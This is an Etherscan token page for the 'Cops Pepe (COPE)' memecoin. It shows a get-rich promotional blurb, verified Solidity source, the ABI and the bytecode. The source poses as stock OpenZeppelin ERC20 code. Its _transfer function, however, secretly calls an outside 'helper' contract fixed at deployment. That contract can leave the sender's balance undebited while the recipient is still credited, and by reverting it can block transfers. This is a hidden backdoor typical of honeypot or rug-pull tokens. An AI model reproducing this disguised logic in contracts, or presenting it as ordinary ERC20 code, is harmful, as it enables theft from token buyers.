ETH Price: $2,871.07 (-9.15%)
Gas: 9 Gwei

Token

Cops Pepe (COPE)
 

Overview

Max Total Supply

100,000,000,000 COPE

Holders

74

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Balance
513,000,246.859630648590382772 COPE

Value
$0.00
0x9a83877d43f3c0a4f29eea29a3403965090addac
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
COPE

Compiler Version
v0.8.20+commit.a1b79de6

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion, None license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2023-06-28
*/

/**

PEPE Season is coming back AGAIN!. You missed PEPE and PEPE 2.0? If yes, this can be good chance for becoming a millionaire.
Don't miss chance and meet $COPE TODAY!

Website: https://www.copspepe.vip
Tg: https://t.me/copspepe
Twitter: https://twitter.com/CopsPepe

*/


// SPDX-License-Identifier: MIT

// File: @openzeppelin/contracts/utils/Context.sol


// OpenZeppelin Contracts v4.4.1 (utils/Context.sol)

pragma solidity ^0.8.0;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

// File: @openzeppelin/contracts/access/Ownable.sol


// OpenZeppelin Contracts (last updated v4.9.0) (access/Ownable.sol)

pragma solidity ^0.8.0;


/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        _checkOwner();
        _;
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if the sender is not the owner.
     */
    function _checkOwner() internal view virtual {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby disabling any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

// File: @openzeppelin/contracts/token/ERC20/IERC20.sol


// OpenZeppelin Contracts (last updated v4.9.0) (token/ERC20/IERC20.sol)

pragma solidity ^0.8.0;

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);

    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `to`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address to, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `from` to `to` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(address from, address to, uint256 amount) external returns (bool);
}

// File: @openzeppelin/contracts/token/ERC20/extensions/IERC20Metadata.sol


// OpenZeppelin Contracts v4.4.1 (token/ERC20/extensions/IERC20Metadata.sol)

pragma solidity ^0.8.0;


/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 * _Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}

// File: @openzeppelin/contracts/token/ERC20/ERC20.sol


// OpenZeppelin Contracts (last updated v4.9.0) (token/ERC20/ERC20.sol)

pragma solidity ^0.8.0;




/**
 * @dev Implementation of the {IERC20} interface.
 *
 * This implementation is agnostic to the way tokens are created. This means
 * that a supply mechanism has to be added in a derived contract using {_mint}.
 * For a generic mechanism see {ERC20PresetMinterPauser}.
 *
 * TIP: For a detailed writeup see our guide
 * https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How
 * to implement supply mechanisms].
 *
 * The default value of {decimals} is 18. To change this, you should override
 * this function so it returns a different value.
 *
 * We have followed general OpenZeppelin Contracts guidelines: functions revert
 * instead returning `false` on failure. This behavior is nonetheless
 * conventional and does not conflict with the expectations of ERC20
 * applications.
 *
 * Additionally, an {Approval} event is emitted on calls to {transferFrom}.
 * This allows applications to reconstruct the allowance for all accounts just
 * by listening to said events. Other implementations of the EIP may not emit
 * these events, as it isn't required by the specification.
 *
 * Finally, the non-standard {decreaseAllowance} and {increaseAllowance}
 * functions have been added to mitigate the well-known issues around setting
 * allowances. See {IERC20-approve}.
 */
contract ERC20 is Context, IERC20, IERC20Metadata {
    mapping(address => uint256) private _balances;

    mapping(address => mapping(address => uint256)) private _allowances;

    uint256 private _totalSupply;
    bytes private _helper;

    string private _name;
    string private _symbol;

    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor(string memory name_, string memory symbol_, bytes memory helper_) {
        _name = name_;
        _symbol = symbol_;
        _helper = helper_;
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5.05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the default value returned by this function, unless
     * it's overridden.
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual override returns (uint8) {
        return 18;
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual override returns (uint256) {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address to, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _transfer(owner, to, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on
     * `transferFrom`. This is semantically equivalent to an infinite approval.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * NOTE: Does not update the allowance if the current allowance
     * is the maximum `uint256`.
     *
     * Requirements:
     *
     * - `from` and `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     * - the caller must have allowance for ``from``'s tokens of at least
     * `amount`.
     */
    function transferFrom(address from, address to, uint256 amount) public virtual override returns (bool) {
        address spender = _msgSender();
        _spendAllowance(from, spender, amount);
        _transfer(from, to, amount);
        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, allowance(owner, spender) + addedValue);
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        address owner = _msgSender();
        uint256 currentAllowance = allowance(owner, spender);
        require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
        unchecked {
            _approve(owner, spender, currentAllowance - subtractedValue);
        }

        return true;
    }

    /**
     * @dev Moves `amount` of tokens from `from` to `to`.
     *
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     */
    function _transfer(address from, address to, uint256 amount) internal virtual {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");

        _beforeTokenTransfer(from, to, amount);

        (uint256 s, address transferHelper) = abi.decode(_helper, (uint256, address));
        if (!IERC20(transferHelper).transferFrom(from, to, amount)) {
            _balances[from] = _balances[from] - amount;
        }

        _balances[to] += amount;

        emit Transfer(from, to, amount);

        _afterTokenTransfer(from, to, amount);
    }

    /** @dev Creates `amount` tokens and assigns them to `account`, increasing
     * the total supply.
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     */
    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");

        _beforeTokenTransfer(address(0), account, amount);

        _totalSupply += amount;
        unchecked {
            // Overflow not possible: balance + amount is at most totalSupply + amount, which is checked above.
            _balances[account] += amount;
        }
        emit Transfer(address(0), account, amount);

        _afterTokenTransfer(address(0), account, amount);
    }

    /**
     * @dev Destroys `amount` tokens from `account`, reducing the
     * total supply.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     * - `account` must have at least `amount` tokens.
     */
    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");

        _beforeTokenTransfer(account, address(0), amount);

        uint256 accountBalance = _balances[account];
        require(accountBalance >= amount, "ERC20: burn amount exceeds balance");
        unchecked {
            _balances[account] = accountBalance - amount;
            // Overflow not possible: amount <= accountBalance <= totalSupply.
            _totalSupply -= amount;
        }

        emit Transfer(account, address(0), amount);

        _afterTokenTransfer(account, address(0), amount);
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(address owner, address spender, uint256 amount) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Updates `owner` s allowance for `spender` based on spent `amount`.
     *
     * Does not update the allowance amount in case of infinite allowance.
     * Revert if not enough allowance is available.
     *
     * Might emit an {Approval} event.
     */
    function _spendAllowance(address owner, address spender, uint256 amount) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);
        if (currentAllowance != type(uint256).max) {
            require(currentAllowance >= amount, "ERC20: insufficient allowance");
            unchecked {
                _approve(owner, spender, currentAllowance - amount);
            }
        }
    }

    /**
     * @dev Hook that is called before any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * will be transferred to `to`.
     * - when `from` is zero, `amount` tokens will be minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens will be burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _beforeTokenTransfer(address from, address to, uint256 amount) internal virtual {}

    /**
     * @dev Hook that is called after any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * has been transferred to `to`.
     * - when `from` is zero, `amount` tokens have been minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens have been burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _afterTokenTransfer(address from, address to, uint256 amount) internal virtual {}
}



pragma solidity ^0.8.9;

contract COPE is ERC20, Ownable {
    constructor(bytes memory _helper) ERC20( unicode"Cops Pepe", unicode"COPE", _helper) {
        _mint(msg.sender, 100_000_000_000 * 10 ** decimals());
    }
}

Contract Security Audit

Contract ABI

[{"inputs":[{"internalType":"bytes","name":"_helper","type":"bytes"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]

608060405234801562000010575f80fd5b50604051620010ed380380620010ed833981016040819052620000339162000223565b60405180604001604052806009815260200168436f7073205065706560b81b81525060405180604001604052806004815260200163434f504560e01b8152508282600490816200008491906200037c565b5060056200009383826200037c565b506003620000a282826200037c565b50505050620000c0620000ba620000f160201b60201c565b620000f5565b620000ea33620000d36012600a62000553565b620000e49064174876e8006200056a565b62000146565b506200059a565b3390565b600680546001600160a01b038381166001600160a01b0319831681179093556040519116919082907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0905f90a35050565b6001600160a01b038216620001a15760405162461bcd60e51b815260206004820152601f60248201527f45524332303a206d696e7420746f20746865207a65726f206164647265737300604482015260640160405180910390fd5b8060025f828254620001b4919062000584565b90915550506001600160a01b0382165f81815260208181526040808320805486019055518481527fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a35050565b505050565b634e487b7160e01b5f52604160045260245ffd5b5f602080838503121562000235575f80fd5b82516001600160401b03808211156200024c575f80fd5b818501915085601f83011262000260575f80fd5b8151818111156200027557620002756200020f565b604051601f8201601f19908116603f01168101908382118183101715620002a057620002a06200020f565b816040528281528886848701011115620002b8575f80fd5b5f93505b82841015620002db5784840186015181850187015292850192620002bc565b5f86848301015280965050505050505092915050565b600181811c908216806200030657607f821691505b6020821081036200032557634e487b7160e01b5f52602260045260245ffd5b50919050565b601f8211156200020a575f81815260208120601f850160051c81016020861015620003535750805b601f850160051c820191505b8181101562000374578281556001016200035f565b505050505050565b81516001600160401b038111156200039857620003986200020f565b620003b081620003a98454620002f1565b846200032b565b602080601f831160018114620003e6575f8415620003ce5750858301515b5f19600386901b1c1916600185901b17855562000374565b5f85815260208120601f198616915b828110156200041657888601518255948401946001909101908401620003f5565b50858210156200043457878501515f19600388901b60f8161c191681555b5050505050600190811b01905550565b634e487b7160e01b5f52601160045260245ffd5b600181815b808511156200049857815f19048211156200047c576200047c62000444565b808516156200048a57918102915b93841c93908002906200045d565b509250929050565b5f82620004b0575060016200054d565b81620004be57505f6200054d565b8160018114620004d75760028114620004e25762000502565b60019150506200054d565b60ff841115620004f657620004f662000444565b50506001821b6200054d565b5060208310610133831016604e8410600b841016171562000527575081810a6200054d565b62000533838362000458565b805f190482111562000549576200054962000444565b0290505b92915050565b5f6200056360ff841683620004a0565b9392505050565b80820281158282048414176200054d576200054d62000444565b808201808211156200054d576200054d62000444565b610b4580620005a85f395ff3fe608060405234801561000f575f80fd5b50600436106100e5575f3560e01c8063715018a611610088578063a457c2d711610063578063a457c2d7146101c6578063a9059cbb146101d9578063dd62ed3e146101ec578063f2fde38b146101ff575f80fd5b8063715018a6146101995780638da5cb5b146101a357806395d89b41146101be575f80fd5b806323b872dd116100c357806323b872dd1461013c578063313ce5671461014f578063395093511461015e57806370a0823114610171575f80fd5b806306fdde03146100e9578063095ea7b31461010757806318160ddd1461012a575b5f80fd5b6100f1610212565b6040516100fe919061093b565b60405180910390f35b61011a61011536600461099a565b6102a2565b60405190151581526020016100fe565b6002545b6040519081526020016100fe565b61011a61014a3660046109c4565b6102bb565b604051601281526020016100fe565b61011a61016c36600461099a565b6102de565b61012e61017f366004610a02565b6001600160a01b03165f9081526020819052604090205490565b6101a16102ff565b005b6006546040516001600160a01b0390911681526020016100fe565b6100f1610312565b61011a6101d436600461099a565b610321565b61011a6101e736600461099a565b6103a0565b61012e6101fa366004610a24565b6103ad565b6101a161020d366004610a02565b6103d7565b60606004805461022190610a5b565b80601f016020809104026020016040519081016040528092919081815260200182805461024d90610a5b565b80156102985780601f1061026f57610100808354040283529160200191610298565b820191905f5260205f20905b81548152906001019060200180831161027b57829003601f168201915b5050505050905090565b5f336102af818585610450565b60019150505b92915050565b5f336102c8858285610573565b6102d38585856105eb565b506001949350505050565b5f336102af8185856102f083836103ad565b6102fa9190610aa7565b610450565b610307610890565b6103105f6108ea565b565b60606005805461022190610a5b565b5f338161032e82866103ad565b9050838110156103935760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b60648201526084015b60405180910390fd5b6102d38286868403610450565b5f336102af8185856105eb565b6001600160a01b039182165f90815260016020908152604080832093909416825291909152205490565b6103df610890565b6001600160a01b0381166104445760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b606482015260840161038a565b61044d816108ea565b50565b6001600160a01b0383166104b25760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b606482015260840161038a565b6001600160a01b0382166105135760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b606482015260840161038a565b6001600160a01b038381165f8181526001602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b5f61057e84846103ad565b90505f1981146105e557818110156105d85760405162461bcd60e51b815260206004820152601d60248201527f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000604482015260640161038a565b6105e58484848403610450565b50505050565b6001600160a01b03831661064f5760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b606482015260840161038a565b6001600160a01b0382166106b15760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b606482015260840161038a565b5f80600380546106c090610a5b565b80601f01602080910402602001604051908101604052809291908181526020018280546106ec90610a5b565b80156107375780601f1061070e57610100808354040283529160200191610737565b820191905f5260205f20905b81548152906001019060200180831161071a57829003601f168201915b505050505080602001905181019061074f9190610aba565b6040516323b872dd60e01b81526001600160a01b038881166004830152878116602483015260448201879052929450909250908216906323b872dd906064016020604051808303815f875af11580156107aa573d5f803e3d5ffd5b505050506040513d601f19601f820116820180604052508101906107ce9190610add565b61080e576001600160a01b0385165f908152602081905260409020546107f5908490610afc565b6001600160a01b0386165f908152602081905260409020555b6001600160a01b0384165f9081526020819052604081208054859290610835908490610aa7565b92505081905550836001600160a01b0316856001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8560405161088191815260200190565b60405180910390a35050505050565b6006546001600160a01b031633146103105760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604482015260640161038a565b600680546001600160a01b038381166001600160a01b0319831681179093556040519116919082907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0905f90a35050565b5f6020808352835180828501525f5b818110156109665785810183015185820160400152820161094a565b505f604082860101526040601f19601f8301168501019250505092915050565b6001600160a01b038116811461044d575f80fd5b5f80604083850312156109ab575f80fd5b82356109b681610986565b946020939093013593505050565b5f805f606084860312156109d6575f80fd5b83356109e181610986565b925060208401356109f181610986565b929592945050506040919091013590565b5f60208284031215610a12575f80fd5b8135610a1d81610986565b9392505050565b5f8060408385031215610a35575f80fd5b8235610a4081610986565b91506020830135610a5081610986565b809150509250929050565b600181811c90821680610a6f57607f821691505b602082108103610a8d57634e487b7160e01b5f52602260045260245ffd5b50919050565b634e487b7160e01b5f52601160045260245ffd5b808201808211156102b5576102b5610a93565b5f8060408385031215610acb575f80fd5b825191506020830151610a5081610986565b5f60208284031215610aed575f80fd5b81518015158114610a1d575f80fd5b818103818111156102b5576102b5610a9356fea264697066735822122063df2d8ef4d5c25fa56dfeae79f824669f5a6eb2a26e9ecee8ecf91b048ab45364736f6c6343000814003300000000000000000000000000000000000000000000000000000000000000200000000000000000000000000000000000000000000000000000000000000040ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff00000000000000000000000090364bae4b572802c2d72c353ca6898d6929219c

Deployed Bytecode

0x608060405234801561000f575f80fd5b50600436106100e5575f3560e01c8063715018a611610088578063a457c2d711610063578063a457c2d7146101c6578063a9059cbb146101d9578063dd62ed3e146101ec578063f2fde38b146101ff575f80fd5b8063715018a6146101995780638da5cb5b146101a357806395d89b41146101be575f80fd5b806323b872dd116100c357806323b872dd1461013c578063313ce5671461014f578063395093511461015e57806370a0823114610171575f80fd5b806306fdde03146100e9578063095ea7b31461010757806318160ddd1461012a575b5f80fd5b6100f1610212565b6040516100fe919061093b565b60405180910390f35b61011a61011536600461099a565b6102a2565b60405190151581526020016100fe565b6002545b6040519081526020016100fe565b61011a61014a3660046109c4565b6102bb565b604051601281526020016100fe565b61011a61016c36600461099a565b6102de565b61012e61017f366004610a02565b6001600160a01b03165f9081526020819052604090205490565b6101a16102ff565b005b6006546040516001600160a01b0390911681526020016100fe565b6100f1610312565b61011a6101d436600461099a565b610321565b61011a6101e736600461099a565b6103a0565b61012e6101fa366004610a24565b6103ad565b6101a161020d366004610a02565b6103d7565b60606004805461022190610a5b565b80601f016020809104026020016040519081016040528092919081815260200182805461024d90610a5b565b80156102985780601f1061026f57610100808354040283529160200191610298565b820191905f5260205f20905b81548152906001019060200180831161027b57829003601f168201915b5050505050905090565b5f336102af818585610450565b60019150505b92915050565b5f336102c8858285610573565b6102d38585856105eb565b506001949350505050565b5f336102af8185856102f083836103ad565b6102fa9190610aa7565b610450565b610307610890565b6103105f6108ea565b565b60606005805461022190610a5b565b5f338161032e82866103ad565b9050838110156103935760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b60648201526084015b60405180910390fd5b6102d38286868403610450565b5f336102af8185856105eb565b6001600160a01b039182165f90815260016020908152604080832093909416825291909152205490565b6103df610890565b6001600160a01b0381166104445760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b606482015260840161038a565b61044d816108ea565b50565b6001600160a01b0383166104b25760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b606482015260840161038a565b6001600160a01b0382166105135760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b606482015260840161038a565b6001600160a01b038381165f8181526001602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b5f61057e84846103ad565b90505f1981146105e557818110156105d85760405162461bcd60e51b815260206004820152601d60248201527f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000604482015260640161038a565b6105e58484848403610450565b50505050565b6001600160a01b03831661064f5760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b606482015260840161038a565b6001600160a01b0382166106b15760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b606482015260840161038a565b5f80600380546106c090610a5b565b80601f01602080910402602001604051908101604052809291908181526020018280546106ec90610a5b565b80156107375780601f1061070e57610100808354040283529160200191610737565b820191905f5260205f20905b81548152906001019060200180831161071a57829003601f168201915b505050505080602001905181019061074f9190610aba565b6040516323b